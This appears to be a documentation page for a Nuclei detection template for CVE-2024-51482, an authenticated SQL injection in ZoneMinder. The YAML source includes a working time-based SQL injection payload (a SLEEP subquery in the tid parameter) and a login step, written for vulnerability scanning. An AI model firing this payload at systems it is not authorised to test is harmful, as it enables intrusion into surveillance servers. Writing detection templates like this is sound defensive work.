ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
ID: CVE-2024-51482
Severity: critical
Author: ritikchaddha
Tags: cve,cve2024,zoneminder,sqli,authenticated
Description
Section titled “Description”ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
YAML Source
Section titled “YAML Source”id: CVE-2024-51482
info: name: ZoneMinder v1.37.* <= 1.37.64 - SQL Injection author: ritikchaddha severity: critical description: | ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65. reference: - https://securityonline.info/zoneminders-cve-2024-51482-a-10-10-severity-vulnerability-exposes-sql-databases/ - https://github-production-user-asset-6210df.s3.amazonaws.com/104687644/381894613-3cc50e51-68cf-4540-8225-4288f73e0c08.mp4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241129%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241129T074108Z&X-Amz-Expires=300&X-Amz-Signature=9cc5b01b0482cbd5573c223a1d44e9ffed10afd7d042d76e8308dfcf3bb7e8a5&X-Amz-SignedHeaders=host - https://nvd.nist.gov/vuln/detail/CVE-2024-51482 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2024-51482 cwe-id: CWE-89 cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: zoneminder product: zoneminder shodan-query: title:"ZoneMinder" tags: cve,cve2024,zoneminder,sqli,authenticated
flow: http(1) && http(2) && http(3)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
host-redirects: true matchers: - type: word part: body words: - "ZoneMinder</a>" - "ZoneMinder Login</h1>" - "<title>ZoneMinder" condition: or internal: true
- raw: - | POST /zm?view=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=login&postLoginQuery=&username={{username}}&password={{password}}
- | GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(body, "{\"result\":\"OK")' internal: true
- raw: - | @timeout: 30s GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=7' - 'status_code == 200' condition: and# digest: 4b0a00483046022100d324951c2f320ea5d3bcbededb1396fa99770257c341fabbb134454dc9cfb2a4022100bcbaded54c5963cdee12220697d386d018c007fbd719909fabb7fe78b7c3883c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-51482.yaml"